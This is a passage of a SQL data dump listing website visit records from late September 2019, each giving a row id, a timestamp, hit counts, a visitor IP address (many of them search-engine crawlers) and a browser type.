1,1,0,0,'207.46.13.241','other'),(452309,1569754753,3,3,0,0,'66.249.66.134','chrome'),(452310,1569755109,1,1,0,0,'66.249.66.136','chrome'),(452311,1569755765,1,1,0,0,'91.124.181.19','chrome'),(452312,1569755857,1,1,0,0,'141.8.142.2','other'),(452313,1569755861,1,1,0,0,'178.154.200.33','other'),(452314,1569755870,1,1,0,0,'157.55.39.185','other'),(452315,1569755876,1,1,0,0,'37.9.113.10','other'),(452316,1569755952,1,1,0,0,'95.108.181.104','other'),(452317,1569756157,2,2,0,0,'66.249.66.134','chrome'),(452318,1569756295,2,2,0,0,'66.249.66.132','chrome'),(452319,1569757080,1,1,0,0,'66.102.9.164','chrome'),(452320,1569758177,1,1,0,0,'66.249.66.136','chrome'),(452321,1569758419,1,1,0,0,'141.8.142.177','chrome'),(452322,1569758540,1,1,0,0,'141.8.142.50','other'),(452323,1569758593,1,1,0,0,'141.8.142.119','other'),(452324,1569758622,1,1,0,0,'141.8.132.19','other'),(452325,1569759391,1,1,0,0,'95.108.181.104','other'),(452326,1569759399,1,1,0,0,'69.4.89.106','firefox'),(452327,1569759400,1,1,0,0,'69.4.89.106','chrome'),(452328,1569759781,1,1,0,0,'141.8.142.177','other'),(452329,1569759815,1,1,0,0,'45.32.14.134','other'),(452330,1569759816,1,1,0,0,'45.32.14.134','chrome'),(452331,1569759817,1,1,0,0,'66.249.66.132','chrome'),(452332,1569759838,1,1,0,0,'69.4.87.74','other'),(452333,1569759839,1,1,0,0,'69.4.87.74','chrome'),(452334,1569759898,2,2,0,0,'66.249.66.88','chrome'),(452335,1569759921,1,1,0,0,'66.249.66.136','chrome'),(452336,1569760057,1,1,0,0,'207.46.13.221','other'),(452337,1569760155,1,1,0,0,'93.119.227.91','firefox'),(452338,1569760156,1,1,0,0,'93.119.227.91','chrome'),(452339,1569760250,1,1,0,0,'66.249.64.28','chrome'),(452340,1569761033,1,1,0,0,'213.180.203.37','other'),(452341,1569761065,1,1,0,0,'178.154.200.33','other'),(452342,1569761158,1,1,0,0,'93.119.227.19','firefox'),(452343,1569761159,1,1,0,0,'93.119.227.19','other'),(452344,1569761463,2,2,0,0,'66.249.66.132','chrome'),(452345,1569761655,3,3,0,0,'66.249.66.134','chrome'),(452346,1569761869,1,1,0,0,'5.196.87.171','other'),(452347,1569762073,1,1,0,0,'66.249.66.136','chrome'),(452348,1569762104,1,1,0,0,'207.46.13.87','other'),(452349,1569763172,1,1,0,0,'66.249.66.88','chrome'),(452350,1569763548,1,1,0,0,'141.8.188.29','chrome'),(452351,1569763549,1,1,0,0,'66.249.66.136','chrome'),(452352,1569763620,1,1,0,0,'141.8.142.115','other'),(452353,1569764631,1,1,0,0,'8.29.198.25','other'),(452354,1569764860,2,2,0,0,'66.249.66.132','chrome'),(452355,1569764952,1,1,0,0,'8.29.198.26','other'),(452356,1569765397,1,1,0,0,'66.249.66.134','chrome'),(452357,1569765505,1,1,0,0,'141.8.183.15','other'),(452358,1569766352,1,1,0,0,'66.249.66.134','chrome'),(452359,1569766602,1,1,0,0,'37.9.113.10','chrome'),(452360,1569766721,1,1,0,0,'141.8.142.115','other'),(452361,1569766741,1,1,0,0,'141.8.188.12','other'),(452362,1569767427,1,1,0,0,'157.55.39.206','other'),(452363,1569767498,1,1,0,0,'66.249.66.134','chrome'),(452364,1569767677,1,1,0,0,'62.4.14.198','firefox'),(452365,1569768170,1,1,0,0,'213.180.203.37','other'),(452366,1569768173,1,1,0,0,'178.154.200.33','other'),(452367,1569768181,1,1,0,0,'37.9.113.10','chrome'),(452368,1569768186,1,1,0,0,'66.249.66.136','chrome'),(452369,1569768972,1,1,0,0,'62.4.14.198','firefox'),(452370,1569769081,2,2,0,0,'66.249.66.134','chrome'),(452371,1569769125,3,3,0,0,'34.68.150.111','chrome'),(452372,1569769163,2,2,0,0,'35.193.157.195','chrome'),(452373,1569769191,3,3,0,0,'104.154.99.105','chrome'),(452374,1569769204,1,1,0,0,'35.239.57.10','chrome'),(452375,1569769205,2,2,0,0,'35.239.57.10','chrome'),(452376,1569769218,2,2,0,0,'34.68.188.63','chrome'),(452378,1569769250,2,2,0,0,'35.226.31.37','chrome'),(452379,1569769560,2,2,0,0,'66.249.66.132','chrome'),(452380,1569769617,1,1,0,0,'141.8.188.12','other'),(452381,1569769880,2,2,0,0,'46.211.103.99','chrome'),(452382,1569769908,1,1,0,0,'178.133.162.74','chrome'),(452383,1569770115,1,1,0,0,'66.249.66.86','chrome'),(452384,1569770249,4,4,0,0,'66.249.66.134','chrome'),(452385,1569770499,1,1,0,0,'207.46.13.0','other'),(452386,1569771689,1,1,0,0,'207.46.13.134','other'),(452387,1569771795,1,1,0,0,'66.249.66.132','chrome'),(452388,1569772471,1,1,0,0,'178.154.200.60','other'),(452389,1569772496,1,1,0,0,'141.8.132.19','other'),(452390,1569772582,1,1,0,0,'46.211.103.99','chrome'),(452391,1569772937,1,1,0,0,'66.249.66.132','chrome'),(452392,1569773823,1,1,0,0,'46.211.134.62','chrome'),(452393,1569773894,1,1,0,0,'46.219.229.247','chrome'),(452394,1569774036,1,1,0,0,'141.8.142.177','other'),(452395,1569774060,1,1,0,0,'141.8.188.25','other'),(452396,1569774120,1,1,0,0,'66.249.66.132','chrome'),(452397,1569774285,1,1,0,0,'141.8.183.15','other'),(452398,1569774293,1,1,0,0,'5.45.207.65','other'),(452399,1569774448,1,1,0,0,'95.108.213.55','other'),(452400,1569774548,1,1,0,0,'66.249.66.136','chrome'),(452401,1569774761,1,1,0,0,'141.8.142.119','other'),(452402,1569775480,2,2,0,0,'8.29.198.27','other'),(452403,1569775856,1,1,0,0,'141.8.132.12','other'),(452404,1569776478,1,1,0,0,'66.249.66.132','chrome'),(452405,1569777590,1,1,0,0,'46.211.121.195','chrome'),(452406,1569777592,1,1,0,0,'66.249.66.132','chrome'),(452407,1569777861,1,1,0,0,'66.249.66.86','chrome'),(452408,1569778794,4,4,0,0,'66.249.66.132','chrome'),(452409,1569779126,1,1,0,0,'207.46.13.134','other'),(452410,1569779193,1,1,0,0,'66.249.66.134','chrome'),(452411,1569779195,1,1,0,0,'66.249.66.136','chrome'),(452412,1569779836,1,1,0,0,'141.8.142.161','other'),(452413,1569780009,1,1,0,0,'141.8.142.115','other'),(452414,1569780548,1,1,0,0,'157.55.39.139','other'),(452415,1569781002,1,1,0,0,'5.45.207.49','other'),(452416,1569781050,1,1,0,0,'141.8.188.25','other'),(452417,1569781104,1,1,0,0,'66.249.66.136','chrome'),(452418,1569781306,1,1,0,0,'66.249.66.132','chrome'),(452419,1569781699,1,1,0,0,'5.196.87.172','other'),(452420,1569782093,1,1,0,0,'66.249.66.136','chrome'),(452421,1569782526,1,1,0,0,'157.55.39.208','other'),(452422,1569782794,1,1,0,0,'157.55.39.139','other'),(452423,1569782882,1,1,0,0,'141.8.132.12','other'),(452424,1569783053,1,1,0,0,'141.8.142.161','other'),(452425,1569783154,1,1,0,0,'141.8.142.177','other'),(452426,1569783810,1,1,0,0,'5.196.87.172','other'),(452427,1569783997,2,2,0,0,'207.46.13.90','other'),(452428,1569784206,1,1,0,0,'157.55.39.93','other'),(452429,1569784216,1,1,0,0,'157.55.39.208','other'),(452430,1569784264,1,1,0,0,'141.8.188.25','other'),(452431,1569784476,1,1,0,0,'66.249.66.136','chrome'),(452432,1569784654,1,1,0,0,'87.250.224.90','other'),(452433,1569786205,1,1,0,0,'66.249.66.136','chrome'),(452434,1569786328,1,1,0,0,'8.29.198.25','other'),(452435,1569786660,1,1,0,0,'8.29.198.26','other'),(452436,1569787603,1,1,0,0,'66.249.66.134','chrome'),(452437,1569787787,1,1,0,0,'37.9.113.163','other'),(452438,1569787920,1,1,0,0,'157.55.39.139','other'),(452439,1569788280,1,1,0,0,'37.9.113.10','other'),(452440,1569788304,1,1,0,0,'178.154.200.13','other'),(452441,1569788329,1,1,0,0,'37.9.113.177','other'),(452442,1569789100,1,1,0,0,'66.249.66.132','chrome'),(452443,1569789762,1,1,0,0,'77.222.112.240','chrome'),(452444,1569789833,1,1,0,0,'141.8.132.19','other'),(452445,1569791883,1,1,0,0,'141.8.142.164','other'),(452446,1569791996,2,2,0,0,'157.55.39.203','other'),(452447,1569792372,1,1,0,0,'141.8.132.19','chrome'),(452448,1569792417,1,1,0,0,'87.250.224.90','other'),(452449,1569792468,1,1,0,0,'178.154.200.13','other'),(452450,1569792989,1,1,0,0,'157.55.39.93','other'),(452451,1569793470,1,1,0,0,'195.181.161.17','firefox'),(452452,1569793504,1,1,0,0,'93.119.227.34','chrome'),(452454,1569793553,1,1,0,0,'82.145.211.116','other'),(452455,1569793812,1,1,0,0,'157.55.39.244','other'),(452456,1569793957,1,1,0,0,'157.55.39.208','other'),(452457,1569795310,2,2,0,0,'157.55.39.244','other'),(452458,1569795434,1,1,0,0,'37.78.126.206','chrome'),(452459,1569796068,1,1,0,0,'95.108.213.55','other'),(452460,1569796201,1,1,0,0,'37.9.113.33','chrome'),(452461,1569796452,1,1,0,0,'141.8.142.2','other'),(452462,1569796480,2,2,0,0,'66.249.66.134','chrome'),(452463,1569796528,1,1,0,0,'178.154.200.13','other'),(452464,1569797011,1,1,0,0,'141.8.142.177','other'),(452465,1569798447,1,1,0,0,'207.46.13.189','other'),(452466,1569798733,1,1,0,0,'141.8.142.164','chrome'),(452467,1569798754,1,1,0,0,'37.9.113.177','other'),(452468,1569798835,1,1,0,0,'178.154.200.33','chrome'),(452469,1569799001,1,1,0,0,'66.249.66.136','chrome'),(452470,1569799559,2,2,0,0,'207.46.13.189','other'),(452471,1569799717,1,1,0,0,'207.46.13.112','other'),(452472,1569800708,1,1,0,0,'141.8.142.2','other'),(452473,1569800730,1,1,0,0,'95.108.181.104','other'),(452474,1569801316,1,1,0,0,'62.205.134.182','other'),(452475,1569802247,1,1,0,0,'141.8.142.50','other'),(452476,1569803908,1,1,0,0,'141.8.183.15','other'),(452477,1569804038,1,1,0,0,'141.8.132.12','other'),(452478,1569804546,1,1,0,0,'141.8.142.50','other'),(452479,1569805368,1,1,0,0,'141.8.188.29','other'),(452480,1569806873,1,1,0,0,'213.180.203.37','other'),(452481,1569808306,1,1,0,0,'141.8.142.2','other'),(452482,1569808461,1,1,0,0,'66.249.66.134','chrome'),(452483,1569808470,2,2,0,0,'8.29.198.25','other'),(452484,1569808678,1,1,0,0,'5.196.87.175','other'),(452485,1569808728,1,1,0,0,'207.46.13.189','other'),(452486,1569809699,2,2,0,0,'66.249.66.136','chrome'),(452487,1569809758,1,1,0,0,'66.249.66.134','chrome'),(452488,1569810005,1,1,0,0,'141.8.142.2','other'),(452489,1569810081,1,1,0,0,'95.108.181.104','other'),(452490,1569810106,1,1,0,0,'141.8.188.12','other'),(452491,1569810313,1,1,0,0,'207.46.13.112','other'),(452492,1569810526,2,2,0,0,'157.55.39.244','other'),(452493,1569811809,1,1,0,0,'213.180.203.44','other'),(452494,1569812124,1,1,0,0,'91.209.11.236','other'),(452495,1569812167,1,1,0,0,'66.249.66.132','chrome'),(452496,1569813243,1,1,0,0,'66.249.66.88','chrome'),(452497,1569813518,1,1,0,0,'5.196.87.173','other'),(452498,1569814237,1,1,0,0,'213.180.203.37','other'),(452499,1569814860,1,1,0,0,'66.249.66.132','chrome'),(452500,1569815080,2,2,0,0,'207.46.13.189','other'),(452501,1569815266,1,1,0,0,'141.8.142.2','other'),(452502,1569816262,1,1,0,0,'157.55.39.86','other'),(452503,1569816650,1,1,0,0,'157.55.39.244','other'),(452504,1569816887,1,1,0,0,'66.249.66.132','chrome'),(452505,1569817541,1,1,0,0,'46.211.133.112','chrome'),(452506,1569818125,2,2,0,0,'157.55.39.110','other'),(452507,1569818668,1,1,0,0,'62.205.134.182','other'),(452508,1569818705,1,1,0,0,'37.9.113.177','other'),(452509,1569818766,1,1,0,0,'141.8.142.119','other'),(452510,1569819311,1,1,0,0,'8.29.198.27','other'),(452511,1569819585,1,1,0,0,'66.249.66.132','chrome'),(452512,1569819623,1,1,0,0,'8.29.198.25','other'),(452513,1569819746,1,1,0,0,'157.55.39.110','other'),(452514,1569820179,1,1,0,0,'141.8.142.177','chrome'),(452515,1569820213,1,1,0,0,'37.9.113.33','other'),(452516,1569820888,1,1,0,0,'157.55.39.110','other'),(452517,1569820926,1,1,0,0,'66.249.66.136','chrome'),(452518,1569821381,1,1,0,0,'91.196.178.89','chrome'),(452519,1569821385,1,1,0,0,'37.9.113.10','other'),(452520,1569821434,1,1,0,0,'95.108.213.3','chrome'),(452521,1569821571,1,1,0,0,'141.8.183.15','other'),(452522,1569822681,1,1,0,0,'157.55.39.86','other'),(452523,1569822936,1,1,0,0,'141.8.132.2','other'),(452524,1569824637,1,1,0,0,'37.9.113.177','chrome'),(452525,1569824899,2,2,0,0,'157.55.39.86','other'),(452526,1569825981,1,1,0,0,'66.249.66.132','chrome'),(452527,1569826355,1,1,0,0,'141.8.142.164','other'),(452528,1569826373,1,1,0,0,'91.196.178.89','chrome'),(452529,1569826574,1,1,0,0,'128.74.163.149','msie'),(452530,1569827512,1,1,0,0,'91.196.178.86','firefox'),(452531,1569827603,1,1,0,0,'5.255.253.8','chrome'),(452532,1569828082,1,1,0,0,'157.55.39.110','other'),(452533,1569828262,2,2,0,0,'91.196.177.46','firefox'),(452534,1569828424,1,1,0,0,'213.180.203.37','other'),(452535,1569828577,1,1,0,0,'31.43.13.109','chrome'),(452536,1569829200,1,1,0,0,'91.196.178.89','chrome'),(452537,1569829230,1,1,0,0,'46.211.238.85','chrome'),(452538,1569829335,1,1,0,0,'66.249.66.134','chrome'),(452539,1569829726,1,1,0,0,'213.180.203.44','other'),(452540,1569830148,1,1,0,0,'8.29.198.27','other'),(452541,1569830331,1,1,0,0,'157.55.39.86','other'),(452542,1569830459,1,1,0,0,'8.29.198.26','other'),(452543,1569830691,1,1,0,0,'157.55.39.110','other'),(452544,1569830901,1,1,0,0,'141.8.142.119','other'),(452545,1569831052,1,1,0,0,'66.249.66.132','chrome'),(452546,1569832211,1,1,0,0,'66.249.66.134','chrome'),(452547,1569832396,1,1,0,0,'5.45.207.65','other'),(452548,1569832485,1,1,0,0,'213.180.203.44','other'),(452549,1569832548,1,1,0,0,'5.45.207.49','chrome'),(452550,1569832596,1,1,0,0,'141.8.142.119','other'),(452551,1569832610,1,1,0,0,'141.8.132.37','other'),(452552,1569832707,1,1,0,0,'66.249.66.132','chrome'),(452553,1569832924,1,1,0,0,'157.55.39.110','other'),(452554,1569833852,1,1,0,0,'66.249.66.136','chrome'),(452555,1569834106,1,1,0,0,'91.196.178.175','chrome'),(452556,1569835407,1,1,0,0,'95.108.181.103','other'),(452557,1569835625,1,1,0,0,'91.196.178.173','chrome'),(452558,1569836351,2,2,0,0,'66.249.66.134','chrome'),(452559,1569836572,1,1,0,0,'207.46.13.10','other'),(452560,1569836971,1,1,0,0,'109.74.154.72','chrome'),(452561,1569837664,1,1,0,0,'66.249.66.86','chrome'),(452562,1569837929,1,1,0,0,'91.196.178.174','firefox'),(452563,1569838681,1,1,0,0,'141.8.142.177','other'),(452564,1569838726,1,1,0,0,'141.8.142.2','other'),(452565,1569838727,1,1,0,0,'66.249.66.136','chrome'),(452566,1569838764,1,1,0,0,'91.196.178.175','chrome'),(452567,1569840754,2,2,0,0,'207.46.13.10','other'),(452568,1569840819,1,1,0,0,'141.8.142.164','other'),(452569,1569840994,1,1,0,0,'8.29.198.27','other'),(452570,1569841302,1,1,0,0,'8.29.198.26','other'),(452571,1569841406,1,1,0,0,'157.55.39.113','other'),(452572,1569841901,1,1,0,0,'95.108.181.103','other'),(452573,1569841967,1,1,0,0,'141.8.188.12','other'),(452574,1569841972,1,1,0,0,'66.249.66.132','chrome'),(452575,1569842322,1,1,0,0,'213.180.203.44','other'),(452576,1569842341,2,2,0,0,'66.249.66.136','chrome'),(452577,1569842422,1,1,0,0,'91.196.178.89','chrome'),(452578,1569842494,1,1,0,0,'207.46.13.10','other'),(452579,1569842875,1,1,0,0,'91.196.178.171','chrome'),(452580,1569843372,1,1,0,0,'66.249.66.132','chrome'),(452581,1569843843,1,1,0,0,'66.249.83.201','other'),(452582,1569843859,1,1,0,0,'66.249.83.87','other'),(452583,1569843861,1,1,0,0,'66.249.83.199','other'),(452584,1569844972,1,1,0,0,'66.249.66.134','chrome'),(452585,1569845593,1,1,0,0,'178.154.200.60','chrome'),(452586,1569845633,1,1,0,0,'87.250.224.118','other'),(452587,1569845677,1,1,0,0,'5.255.253.8','other'),(452588,1569845715,1,1,0,0,'95.108.181.103','other'),(452589,1569845723,1,1,0,0,'157.55.39.113','other'),(452590,1569845915,1,1,0,0,'37.54.23.51','chrome'),(452591,1569845925,1,1,0,0,'66.249.66.134','chrome'),(452592,1569846225,1,1,0,0,'62.4.14.206','firefox'),(452593,1569846362,1,1,0,0,'207.46.13.10','other'),(452594,1569846743,1,1,0,0,'178.154.200.60','other'),(452595,1569847337,1,1,0,0,'66.249.66.136','chrome'),(452596,1569847852,1,1,0,0,'87.250.224.118','other'),(452597,1569847875,1,1,0,0,'157.55.39.113','other'),(452598,1569848067,1,1,0,0,'178.154.200.60','other'),(452599,1569848125,1,1,0,0,'207.46.13.10','other'),(452600,1569848632,1,1,0,0,'91.196.178.89','chrome'),(452601,1569848877,1,1,0,0,'66.249.66.136','chrome'),(452602,1569849190,1,1,0,0,'141.8.142.164','other'),(452603,1569849248,1,1,0,0,'141.8.132.2','other'),(452604,1569849288,1,1,0,0,'37.9.113.10','other'),(452605,1569849650,1,1,0,0,'195.24.157.246','firefox'),(452606,1569849695,1,1,0,0,'91.196.178.86','firefox'),(452607,1569850556,1,1,0,0,'62.4.14.206','firefox'),(452608,1569850624,1,1,0,0,'66.249.66.132','chrome'),(452609,1569851144,1,1,0,0,'207.46.13.10','other'),(452610,1569851868,2,2,0,0,'8.29.198.26','other'),(452611,1569852025,1,1,0,0,'157.55.39.113','other'),(452612,1569852502,1,1,0,0,'157.55.39.81','other'),(452613,1569852527,1,1,0,0,'62.216.207.167','other'),(452614,1569852735,2,2,0,0,'207.46.13.10','other'),(452615,1569853929,1,1,0,0,'141.8.142.50','other'),(452616,1569854077,1,1,0,0,'95.108.181.103','other'),(452617,1569854084,1,1,0,0,'5.255.253.8','other'),(452618,1569854155,2,2,0,0,'207.46.13.10','other'),(452619,1569854335,1,1,0,0,'213.180.203.37','other'),(452620,1569854717,1,1,0,0,'157.55.39.81','other'),(452621,1569854892,1,1,0,0,'157.55.39.245','other'),(452622,1569855451,1,1,0,0,'141.8.132.2','other'),(452623,1569855620,3,3,0,0,'34.67.94.203','chrome'),(452624,1569855634,3,3,0,0,'35.239.57.92','chrome'),(452625,1569856124,1,1,0,0,'91.196.178.89','firefox'),(452626,1569856169,1,1,0,0,'128.71.5.184','chrome'),(452627,1569856539,1,1,0,0,'46.211.98.42','chrome'),(452628,1569856631,1,1,0,0,'157.55.39.205','other'),(452629,1569856845,1,1,0,0,'66.249.66.132','chrome'),(452630,1569857604,1,1,0,0,'141.8.132.12','other'),(452631,1569858315,3,3,0,0,'66.249.66.134','chrome'),(452632,1569858450,1,1,0,0,'141.8.132.2','other'),(452633,1569858479,1,1,0,0,'141.8.188.25','other'),(452634,1569858820,1,1,0,0,'157.55.39.81','other'),(452635,1569859340,1,1,0,0,'5.196.87.171','other'),(452636,1569859952,1,1,0,0,'141.8.132.28','other'),(452637,1569860164,1,1,0,0,'128.71.5.184','chrome'),(452638,1569860482,1,1,0,0,'66.249.66.136','chrome'),(452639,1569860734,1,1,0,0,'95.27.140.19','msie'),(452640,1569861224,1,1,0,0,'141.8.132.2','other'),(452641,1569861266,1,1,0,0,'178.154.200.71','other'),(452642,1569862745,2,2,0,0,'8.29.198.25','other'),(452643,1569862800,1,1,0,0,'157.55.39.163','other'),(452644,1569862820,1,1,0,0,'66.249.66.136','chrome'),(452645,1569862965,1,1,0,0,'66.249.66.88','chrome'),(452646,1569863043,1,1,0,0,'141.8.188.12','other'),(452647,1569863179,1,1,0,0,'46.211.131.53','chrome'),(452648,1569863216,1,1,0,0,'157.55.39.164','other'),(452649,1569863565,1,1,0,0,'46.96.25.172','chrome'),(452650,1569864022,2,2,0,0,'66.249.66.134','chrome'),(452651,1569864063,1,1,0,0,'5.45.207.49','other'),(452652,1569864149,1,1,0,0,'5.196.87.172','other'),(452653,1569864172,1,1,0,0,'13.66.139.0','other'),(452654,1569864234,1,1,0,0,'157.55.39.163','other'),(452655,1569864320,1,1,0,0,'157.55.39.164','other'),(452656,1569864416,1,1,0,0,'141.8.132.2','other'),(452657,1569865098,1,1,0,0,'91.209.11.236','other'),(452658,1569865422,1,1,0,0,'37.9.113.177','other'),(452659,1569865689,2,2,0,0,'66.249.66.132','chrome'),(452660,1569865989,1,1,0,0,'37.9.113.10','other'),(452661,1569866474,1,1,0,0,'157.55.39.164','other'),(452662,1569867041,1,1,0,0,'31.13.127.8','other'),(452663,1569867683,1,1,0,0,'87.250.224.90','other'),(452664,1569868145,1,1,0,0,'207.46.13.99','other'),(452665,1569868213,1,1,0,0,'141.8.142.50','chrome'),(452666,1569868858,1,1,0,0,'46.211.225.109','chrome'),(452667,1569868880,1,1,0,0,'5.255.253.8','other'),(452668,1569869176,1,1,0,0,'13.66.139.0','other'),(452669,1569870145,1,1,0,0,'66.249.66.136','chrome'),(452670,1569870627,3,3,0,0,'66.249.66.134','chrome'),(452671,1569871105,1,1,0,0,'178.154.171.7','other'),(452672,1569871128,1,1,0,0,'178.154.200.13','other'),(452673,1569871318,1,1,0,0,'66.249.66.88','chrome'),(452674,1569871484,3,3,0,0,'66.249.66.132','chrome'),(452675,1569871731,1,1,0,0,'66.249.66.86','chrome'),(452676,1569871886,1,1,0,0,'157.55.39.221','other'),(452677,1569872643,1,1,0,0,'141.8.142.2','chrome'),(452678,1569872699,1,1,0,0,'207.46.13.71','other'),(452679,1569873348,1,1,0,0,'157.55.39.164','other'),(452680,1569873598,2,2,0,0,'8.29.198.26','other'),(452681,1569873616,1,1,0,0,'66.249.66.88','chrome'),(452682,1569874018,1,1,0,0,'66.249.66.86','chrome'),(452683,1569874214,2,2,0,0,'95.213.141.126','opera'),(452684,1569874559,2,2,0,0,'66.249.66.134','chrome'),(452685,1569874593,1,1,0,0,'141.8.188.18','other'),(452686,1569875283,1,1,0,0,'157.55.39.164','other'),(452687,1569875392,1,1,0,0,'207.46.13.71','other'),(452688,1569875551,1,1,0,0,'141.8.132.12','other'),(452689,1569875688,1,1,0,0,'141.8.188.12','other'),(452690,1569876079,1,1,0,0,'66.249.66.132','chrome'),(452691,1569876650,1,1,0,0,'207.46.13.63','other'),(452692,1569876978,1,1,0,0,'37.9.113.163','other'),(452693,1569877117,1,1,0,0,'207.46.13.34','other'),(452694,1569877275,1,1,0,0,'141.8.142.119','other'),(452695,1569878198,1,1,0,0,'66.249.66.134','chrome'),(452696,1569878288,1,1,0,0,'207.46.13.34','other'),(452697,1569879215,1,1,0,0,'66.249.66.136','chrome'),(452698,1569879911,1,1,0,0,'66.249.66.134','chrome'),(452699,1569879927,1,1,0,0,'87.250.224.90','other'),(452700,1569880000,1,1,0,0,'213.180.203.37','other'),(452701,1569880834,1,1,0,0,'66.249.66.136','chrome'),(452702,1569881589,1,1,0,0,'207.46.13.34','other'),(452703,1569881697,1,1,0,0,'66.249.66.134','chrome'),(452704,1569881858,1,1,0,0,'66.249.66.132','chrome'),(452705,1569881889,1,1,0,0,'2.95.139.57','chrome'),(452706,1569882482,1,1,0,0,'5.196.87.175','other'),(452707,1569882567,1,1,0,0,'51.15.191.81','firefox'),(452708,1569883535,1,1,0,0,'66.249.66.136','chrome'),(452709,1569884127,1,1,0,0,'5.255.253.8','other'),(452710,1569884460,1,1,0,0,'8.29.198.25','other'),(452711,1569884706,1,1,0,0,'8.29.198.27','other'),(452712,1569884709,1,1,0,0,'5.196.87.173','other'),(452713,1569885334,1,1,0,0,'157.55.39.167','other'),(452714,1569886017,1,1,0,0,'141.8.132.12','other'),(452715,1569886179,1,1,0,0,'207.46.13.34','other'),(452716,1569887642,1,1,0,0,'66.249.66.136','chrome'),(452717,1569887714,1,1,0,0,'62.205.134.182','other'),(452718,1569887912,1,1,0,0,'66.249.66.132','chrome'),(452719,1569888345,1,1,0,0,'178.154.171.7','other'),(452720,1569888348,1,1,0,0,'141.8.188.38','chrome'),(452721,1569888395,1,1,0,0,'141.8.183.15','other'),(452722,1569888461,1,1,0,0,'207.46.13.34','other'),(452723,1569888869,1,1,0,0,'66.249.66.134','chrome'),(452724,1569888955,1,1,0,0,'51.68.152.26','chrome'),(452725,1569889179,1,1,0,0,'37.9.113.10','other'),(452726,1569889705,1,1,0,0,'87.250.224.90','other'),(452727,1569889710,1,1,0,0,'178.154.200.71','other'),(452728,1569889968,1,1,0,0,'157.55.39.167','other'),(452729,1569891050,1,1,0,0,'141.8.142.119','chrome'),(452730,1569891143,1,1,0,0,'178.154.171.7','other'),(452731,1569891709,1,1,0,0,'66.249.66.136','chrome'),(452732,1569891785,2,2,0,0,'141.8.142.119','other'),(452733,1569892281,1,1,0,0,'37.9.113.177','other'),(452734,1569892313,1,1,0,0,'141.8.142.50','chrome'),(452735,1569892545,1,1,0,0,'37.9.113.10','other'),(452736,1569892547,1,1,0,0,'66.249.66.132','chrome'),(452737,1569892859,2,2,0,0,'66.249.66.134','chrome'),(452738,1569893022,1,1,0,0,'87.250.224.90','other'),(452739,1569893784,1,1,0,0,'66.249.66.132','chrome'),(452740,1569893805,2,2,0,0,'66.249.66.134','chrome'),(452741,1569894006,1,1,0,0,'141.8.142.119','other'),(452742,1569894010,1,1,0,0,'37.9.113.33','other'),(452743,1569894386,1,1,0,0,'207.46.13.30','other'),(452744,1569894494,1,1,0,0,'207.46.13.34','other'),(452745,1569895055,1,1,0,0,'5.45.207.65','other'),(452746,1569895317,2,2,0,0,'8.29.198.27','other'),(452747,1569895354,1,1,0,0,'66.249.66.132','chrome'),(452748,1569895380,1,1,0,0,'95.108.181.103','other'),(452749,1569895590,1,1,0,0,'141.8.183.33','other'),(452750,1569896827,1,1,0,0,'87.250.224.104','other'),(452751,1569896869,1,1,0,0,'5.45.207.44','other'),(452752,1569896894,1,1,0,0,'213.180.203.37','other'),(452753,1569897068,1,1,0,0,'95.108.181.103','other'),(452754,1569897768,1,1,0,0,'213.159.213.236','chrome'),(452755,1569898287,1,1,0,0,'87.250.224.90','other'),(452756,1569898294,1,1,0,0,'95.108.181.104','other'),(452757,1569899813,1,1,0,0,'62.4.14.198','firefox'),(452758,1569900042,1,1,0,0,'5.45.207.65','other'),(452759,1569900067,1,1,0,0,'141.8.142.50','other'),(452760,1569900137,1,1,0,0,'141.8.142.115','other'),(452761,1569901547,1,1,0,0,'207.46.13.45','other'),(452762,1569902230,1,1,0,0,'66.249.66.134','chrome'),(452763,1569902237,1,1,0,0,'66.249.66.132','chrome'),(452764,1569902249,1,1,0,0,'207.46.13.191','other'),(452765,1569902638,1,1,0,0,'37.9.113.163','chrome'),(452766,1569903874,1,1,0,0,'207.46.13.45','other'),(452767,1569904175,1,1,0,0,'66.249.66.136','chrome'),(452768,1569904797,1,1,0,0,'141.8.188.12','other'),(452769,1569904978,1,1,0,0,'157.55.39.109','other'),(452770,1569905135,1,1,0,0,'62.205.134.182','other'),(452771,1569906045,1,1,0,0,'66.249.66.134','chrome'),(452772,1569906173,1,1,0,0,'8.29.198.25','other'),(452773,1569906362,1,1,0,0,'141.8.142.164','other'),(452774,1569906388,1,1,0,0,'178.154.200.13','other'),(452775,1569906390,1,1,0,0,'8.29.198.27','other'),(452776,1569906410,1,1,0,0,'157.55.39.109','other'),(452777,1569907545,1,1,0,0,'37.9.113.163','other'),(452778,1569907636,1,1,0,0,'141.8.142.50','other'),(452779,1569909213,1,1,0,0,'157.55.39.109','other'),(452780,1569909584,1,1,0,0,'46.211.97.105','chrome'),(452781,1569910270,1,1,0,0,'178.154.200.60','other'),(452782,1569910295,1,1,0,0,'141.8.142.115','other'),(452783,1569910373,1,1,0,0,'141.8.142.2','other'),(452784,1569910716,1,1,0,0,'66.249.66.136','chrome'),(452785,1569910881,1,1,0,0,'13.66.139.0','other'),(452786,1569910959,1,1,0,0,'207.46.13.191','other'),(452787,1569911618,1,1,0,0,'95.108.213.55','other'),(452788,1569911669,1,1,0,0,'141.8.142.164','other'),(452789,1569911723,1,1,0,0,'37.9.113.177','other'),(452790,1569911781,1,1,0,0,'66.249.66.132','chrome'),(452791,1569912117,1,1,0,0,'5.228.207.182','msie'),(452792,1569912235,2,2,0,0,'66.249.66.134','chrome'),(452793,1569912381,2,2,0,0,'66.249.66.136','chrome'),(452794,1569912864,1,1,0,0,'95.108.181.104','chrome'),(452795,1569913411,1,1,0,0,'87.250.224.90','other'),(452796,1569913506,1,1,0,0,'91.196.178.65','chrome'),(452797,1569913926,1,1,0,0,'66.249.66.132','chrome'),(452798,1569914229,1,1,0,0,'207.46.13.191','other'),(452799,1569914595,1,1,0,0,'141.8.132.12','other'),(452800,1569914684,1,1,0,0,'66.249.66.136','chrome'),(452801,1569915136,1,1,0,0,'95.132.29.169','chrome'),(452802,1569915255,1,1,0,0,'207.46.13.191','other'),(452803,1569915265,1,1,0,0,'5.196.87.175','other'),(452804,1569916514,1,1,0,0,'141.8.183.15','other'),(452805,1569916532,1,1,0,0,'141.8.142.50','other'),(452806,1569916653,1,1,0,0,'141.8.142.119','other'),(452807,1569917028,1,1,0,0,'8.29.198.27','other'),(452808,1569917230,1,1,0,0,'8.29.198.25','other'),(452809,1569917750,1,1,0,0,'37.9.113.177','other'),(452810,1569918839,1,1,0,0,'66.249.66.134','chrome'),(452811,1569919455,1,1,0,0,'91.196.178.65','chrome'),(452812,1569919546,1,1,0,0,'66.249.66.132','chrome'),(452813,1569919580,1,1,0,0,'